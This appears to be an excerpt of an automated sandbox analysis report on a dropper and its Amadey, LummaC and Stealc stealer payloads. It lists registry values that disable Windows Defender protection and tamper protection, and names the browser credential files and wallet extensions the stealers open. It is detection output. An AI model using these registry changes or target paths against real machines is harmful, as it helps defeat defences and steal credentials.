Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060330101\40c4d92e87.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060350101\977b4d66ef.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060360121\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060360121\am_no.cmd VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10060290101\dd662b5386.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10060300101\dbe8776a6a.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10060320101\43a79b4335.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: unknown VolumeInformation

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009D93A7 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,

0_2_009D93A7

Source: C:\Users\user\Desktop\random.exe

0_2_009B61F0

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009EE68E _free,_free,_free,GetTimeZoneInformation,_free,

0_2_009EE68E

Source: C:\Users\user\Desktop\random.exe

Code function: 0_2_009B93D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_009B93D0

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\10060340101\cefa09b2a4.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: 9f19f13091.exe, 00000006.00000002.2271472152.0000000000CDD000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2420741970.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000002.2467802038.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2456165558.0000000005647000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2421217558.0000000005646000.00000004.00000800.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2420995371.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 5a20b6327b.exe, 0000000B.00000003.2445869200.0000000005646000.00000004.00000800.00020000.00000000.sdmp, 1e8e57d62a.exe, 0000000C.00000003.2533409056.00000000006DD000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2859332612.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp, 186adf2617.exe, 00000011.00000003.2815871726.0000000000FD4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\10060260101\9f19f13091.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\10060270101\5a20b6327b.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\10060280101\1e8e57d62a.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadey

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: random.exe, type: SAMPLE
Source: Yara match	File source: 1.0.rapes.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.random.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.rapes.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.0.O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe.270000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rapes.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.rapes.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.random.exe.9b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000003.2883832721.0000000005AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\O5B9GD1ATV6RLTMC0ANGDNKXPTNV.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, type: DROPPED

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 40c4d92e87.exe PID: 6712, type: MEMORYSTR

Yara detected GCleaner

Source: Yara match	File source: 15.2.dbe8776a6a.exe.de84000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.dbe8776a6a.exe.de2c000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e4a6000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.dbe8776a6a.exe.de58000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.dbe8776a6a.exe.e11e000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e2b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.3.dbe8776a6a.exe.e11e000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.dbe8776a6a.exe.deb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.dd662b5386.exe.e4a6000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e284000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e22c000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.dd662b5386.exe.e258000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2984395699.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.2588966469.000000000E496000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2729419667.000000000E11E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2623904415.000000000E284000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2727875020.000000000DEB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2727875020.000000000DE84000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3075849533.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2623904415.000000000E2B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2625220408.000000000E4A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2622048225.000000000E12A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2727875020.000000000DE2C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2623904415.000000000E22C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.2623904415.000000000E258000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2695143135.000000000E10E000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2727875020.000000000DE58000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2723992031.000000000DD22000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 5a20b6327b.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 1e8e57d62a.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 186adf2617.exe PID: 5276, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 186adf2617.exe PID: 3404, type: MEMORYSTR
Source: Yara match	File source: 4.2.9f19f13091.exe.3529550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.9f19f13091.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.9f19f13091.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.186adf2617.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.5a20b6327b.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.186adf2617.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.2280248529.0000000003529000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2456390039.00000000004A1000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2647212161.0000000000DF1000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2928007438.00000000008E1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2383837159.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2965760104.00000000008E1000.00000040.00000001.01000000.00000013.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2270658684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: 9f19f13091.exe PID: 3136, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000023.00000002.2908473776.0000000000EA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2770927261.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.2859283986.0000000004AE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000003.2720138631.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2761501822.0000000000EA1000.00000040.00000001.01000000.00000014.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.2903358595.00000000006BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 43a79b4335.exe PID: 3656, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 5a20b6327b.exe	String found in binary or memory: Wallets/Electrum-LTC
Source: 5a20b6327b.exe	String found in binary or memory: Wallets/ElectronCash
Source: 5a20b6327b.exe	String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: 5a20b6327b.exe	String found in binary or memory: window-state.json
Source: 5a20b6327b.exe, 0000000B.00000003.2409337791.0000000000CD0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: 5a20b6327b.exe	String found in binary or memory: ExodusWeb3
Source: 5a20b6327b.exe	String found in binary or memory: %appdata%\Ethereum
Source: 5a20b6327b.exe	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 5a20b6327b.exe, 0000000B.00000003.2408739793.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\10060310101\186adf2617.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
